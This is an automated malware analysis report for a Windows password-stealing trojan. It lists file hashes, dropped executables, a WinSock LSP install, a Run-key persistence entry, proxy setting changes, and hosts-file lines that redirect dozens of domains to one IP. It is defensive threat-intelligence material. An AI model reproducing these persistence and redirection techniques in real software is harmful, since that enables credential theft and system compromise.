HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Graftor.37429 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, TrojanFlyStudio.YR (Lavasoft MAS)Behaviour: Trojan-PSW, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 5193a201b7355f6ac00af96184d29d5d
SHA1: d66f981e23494860656b31e27e5dd4fcf8d91b46
SHA256: 4aa669e7382244709987ac4d6e52f0c966f373c65353d9d6778e6d5bd92fae51
SSDeep: 98304:GQHA/3XxoSj3XsbIABdUf0uXFvWomZHF7b MxntyV n:GQHAfxdjH4I8qVJGHF/txt n
Size: 5135223 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-08-14 22:15:49
Analyzed on: Windows7 SP1 32-bit
Summary: Trojan-PSW. Trojan program intended for stealing users passwords.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
svchostlsp.exe:3736
%original file name%.exe:452
117my.exe:2736
117my.exe:944
The Trojan injects its code into the following process(es):
svchosl.exe:3732
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process svchostlsp.exe:3736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\twain_32\config\ESPI11.dll (244 bytes)
C:\Windows\System32\addressoftext.inscan (1 bytes)
C:\Windows\System32\ESPI11.dll (723 bytes)
The process %original file name%.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\svchost.exe (12649 bytes)
C:\Windows\117my.exe (7296 bytes)
C:\Windows\117my.com.bat (258 bytes)
C:\Windows\Game.ico:Zone.Identifier (26 bytes)
C:\Windows\svchosl.exe (8713 bytes)
C:\Windows\Game.ico (1978 bytes)
C:\Windows\117my.skn (2160 bytes)
C:\Users\"%CurrentUserName%"\Desktop\117éÂâ€Ã¥Å¸Å¸7.1.lnk (1 bytes)
The Trojan deletes the following file(s):
C:\Windows\__tmp_rar_sfx_access_check_1308957 (0 bytes)
The process svchosl.exe:3732 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YBU4WGCW.txt (103 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\host[1].htm (775 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CCQ2R3OL.txt (0 bytes)
The process 117my.exe:2736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\117my.exe (294 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\svchostlsp.exe (1948 bytes)
The process 117my.exe:944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\JpHrc.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\Mag.dat (101 bytes)
C:\Windows\System32\drivers\etc\hosts (39 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\Repairdata.txt (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\117my.skn (62 bytes)
C:\Windows\117my.skn (65 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\117my.ini (28 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\iat.dll (89 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OF9L3DR3.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\fc72ORSzwyUu08nYIdyG-ygy8w8[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OLCWAOT0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\_yaru.ru[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YJCP8HIK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\jquery.min[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\fc07[1].swf (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\eS-nxtWWJ1LfBWLfd096swuFjH4[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\f[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\9fkhsVhseQ-JJcxiLZwCHjhHY[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\00CZ9B9Z.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BPMHTAIlmc5kh6Tymb1I2mmfSAc[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\ZZxR-E_UBI8_1IS7VtDkH_bgw[1].css (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\59FYE1S2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\JpHrc.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QVWF9XLH.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K3H6JGON.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SHMEGTHE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\379IMDJA.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\VqEnvKPzCrM8a4pakUu0bzh7d9o[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G6NPTRAV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\watch[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HGQPYGV7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YBU4WGCW.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\4CWVLDFS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\Repairdata.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A5VV6NGJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\search[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\O761920L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FBUBDDF0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\983WD333.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\spacer[1].gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ya_favicon_ru[1].ico (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PMGXNABP.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJQLWW1A.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LXL295FY.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\AllServices[1].xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\fc07_2[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CZKDRHGB.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\P2Z07O4S.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\VPSNR0J4.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\nearest[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Tsv1TyvAx4g5KyOkiAdSP1Stniw[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SN1VAMHK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SK6RC4AQ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8WNTYFZE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\otvet.mail[1].png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KK0IK9EV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\_search.uk[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KCULDY7L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\MG_en-us[1].xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\GetMDRCDPOSTURL[1].aspx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7ZFPBM01.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\ETGRPT21.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KJGZP41Y.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8Q2KNK5G.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NWCBOWT9.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1I56O6EZ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Yd__VnAFnBZBQiIS0sHoF6FGRC8[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PFR2GFQJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GB74HSLE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KUZ61ORW.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KE9BMB37.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UFT3VMU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K4EMAOY7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GF0JZXVN.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XJJJSX58.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FDGZES7U.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\03Z3OHNC.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\IAU75TW2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AW5IGQT7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\f[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\0VR58838.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Z40SB5AS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\jquery.min[1].js (0 bytes)
Registry activity
The process svchostlsp.exe:3736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\System\CurrentControlSet\Services\WinSock2\ESPI11]
"FileName" = "C:\Windows\system32\ESPI11.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\System\CurrentControlSet\Services\WinSock2\ESPI11]
"1014" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
"1012" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASMANCS]
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 73 79 73 74 65"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 73 79 73 74 65"
[HKLM\System\CurrentControlSet\Services\WinSock2\ESPI11]
"1002" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
"1003" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
"1001" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 73 79 73 74 65"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 73 79 73 74 65"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 40 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
"PackedCatalogItem" = "43 3A 5C 57 69 6E 64 6F 77 73 5C 73 79 73 74 65"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCU]
"wodezhucbxm_1" = "393972"
[HKLM\SOFTWARE\Microsoft\Tracing\svchostlsp_RASMANCS]
"FileDirectory" = "%windir%\tracing"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process %original file name%.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process svchosl.exe:3732 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU]
"wodezpoiuy_5" = "328482"
[HKLM\SOFTWARE\Microsoft\Tracing\svchosl_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\svchosl_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\svchosl_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\svchosl_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\svchosl_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\svchosl_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\svchosl_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\svchosl_RASMANCS]
"EnableFileTracing" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"xf1" = "C:\Windows\svchosl.exe /start"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process 117my.exe:2736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process 117my.exe:944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"WindowClassName" = "DDEMLMom"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASMANCS]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\117my_RASMANCS]
"EnableConsoleTracing" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
0392346d2aa6c76da5ca7dda28564b41 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\117my.exe |
4a9e26121421e5b6c47f50309cb63266 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\117my.skn |
671575e2cc623b3d093538f1e658ad93 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Data\iat.dll |
23d8fd353597d2edda54bdbad280749f | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\svchostlsp.exe |
6a455c4a2c7fe46c633fd085c0204696 | c:\Windows\117my.exe |
4a9e26121421e5b6c47f50309cb63266 | c:\Windows\117my.skn |
6ded751b628ddb2a1c0c05f18858437c | c:\Windows\System32\ESPI11.dll |
ee6c854fa4e81138fcfcfbda7418ec6b | c:\Windows\svchosl.exe |
57b609130b60649f4a2729b164b7527b | c:\Windows\svchost.exe |
6ded751b628ddb2a1c0c05f18858437c | c:\Windows\twain_32\config\ESPI11.dll |
HOSTS file anomalies
The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses. The modified file is 5537 bytes in size. The following strings are added to the hosts file listed below:
170.178.171.31 | www.176cc.cc |
170.178.171.31 | www.52my.com |
170.178.171.31 | www.crsky.com |
170.178.171.31 | crsky.com |
170.178.171.31 | www.901my.com |
170.178.171.31 | 901my.com |
170.178.171.31 | moyu.so |
170.178.171.31 | kkk.dstfkj.com.cn |
170.178.171.31 | dstfkj.com.cn |
170.178.171.31 | www.214my.com |
170.178.171.31 | www.h360k.com |
170.178.171.31 | h360k.com |
170.178.171.31 | rsivy.pw |
170.178.171.31 | 214my.com |
170.178.171.31 | www.270my.com |
170.178.171.31 | 360.chihuo0517.com |
170.178.171.31 | chihuo0517.com |
170.178.171.31 | 270my.com |
170.178.171.31 | www.moyu.so |
170.178.171.31 | www.hwkam.com |
170.178.171.31 | 178stu.com |
170.178.171.31 | www.178stu.com |
170.178.171.31 | hwkam.com |
170.178.171.31 | www.5917wan.com |
170.178.171.31 | www.delifs.com |
170.178.171.31 | delifs.com |
170.178.171.31 | www.11moyu.com |
170.178.171.31 | t2.web.tonnn.com |
170.178.171.31 | www.2828my.com |
170.178.171.31 | 2828my.com |
170.178.171.31 | tonnn.com |
170.178.171.31 | www.11my.net |
170.178.171.31 | www.91my.com |
170.178.171.31 | 91my.com |
170.178.171.31 | wg.91my.com |
170.178.171.31 | my.178stu.com |
170.178.171.31 | 134my.com |
170.178.171.31 | www.134my.com |
170.178.171.31 | 001my.com |
170.178.171.31 | www.910my.com |
170.178.171.31 | 910my.com |
170.178.171.31 | www.901my.com |
170.178.171.31 | 901my.com |
170.178.171.31 | www.6moyu.com |
170.178.171.31 | 110moyu.com |
170.178.171.31 | www.110moyu.com |
170.178.171.31 | dl.pconline.com.cn |
170.178.171.31 | www.moyushou.com |
170.178.171.31 | pconline.com.cn |
170.178.171.31 | www.52z.com |
170.178.171.31 | wanba.baidu.com |
170.178.171.31 | www.99sfmy.com |
170.178.171.31 | www.mycom114.com |
170.178.171.31 | www.xpy7.com |
170.178.171.31 | xpy7.com |
170.178.171.31 | www.tztw88.net |
170.178.171.31 | www.cncrk.com |
170.178.171.31 | www.laomy.net |
170.178.171.31 | www.kk8181.com |
170.178.171.31 | pk255.com |
170.178.171.31 | www.pk255.com |
170.178.171.31 | www.99hjmy.com |
170.178.171.31 | www.550my.com |
170.178.171.31 | 99moyu.net |
170.178.171.31 | www.n13.cc |
170.178.171.31 | www.18ytl.com |
170.178.171.31 | www.x99my.cc |
170.178.171.31 | tg.weegame.com |
170.178.171.31 | weegame.com |
170.178.171.31 | t.cnsaier.com |
170.178.171.31 | cnsaier.com |
170.178.171.31 | laas.zafu.edu.cn |
170.178.171.31 | www.tianya.cn |
170.178.171.31 | www.9000my.com |
170.178.171.31 | 139my.3313sf.cn |
170.178.171.31 | www.qweqt.org.cn |
170.178.171.31 | moyu.spxwj.com |
170.178.171.31 | www.ahwfauto.com |
170.178.171.31 | www.ttms168.com |
170.178.171.31 | www.x99moyu.net |
170.178.171.31 | t.kmly988.com |
170.178.171.31 | t.ahtaoy.com |
170.178.171.31 | t.cnsaier.com |
170.178.171.31 | www.55moyu.com |
170.178.171.31 | www.xsf7.com |
170.178.171.31 | 99moyu.com |
170.178.171.31 | www.99moyu.com |
170.178.171.31 | sogou.1118st.com |
170.178.171.31 | 1118st.com |
170.178.171.31 | www.173185.net |
170.178.171.31 | www.518ak.com |
170.178.171.31 | lpput.com |
170.178.171.31 | hjmyh.com |
170.178.171.31 | www.5555my.com |
170.178.171.31 | aaa.5555my.com |
170.178.171.31 | www.hjmyh.com |
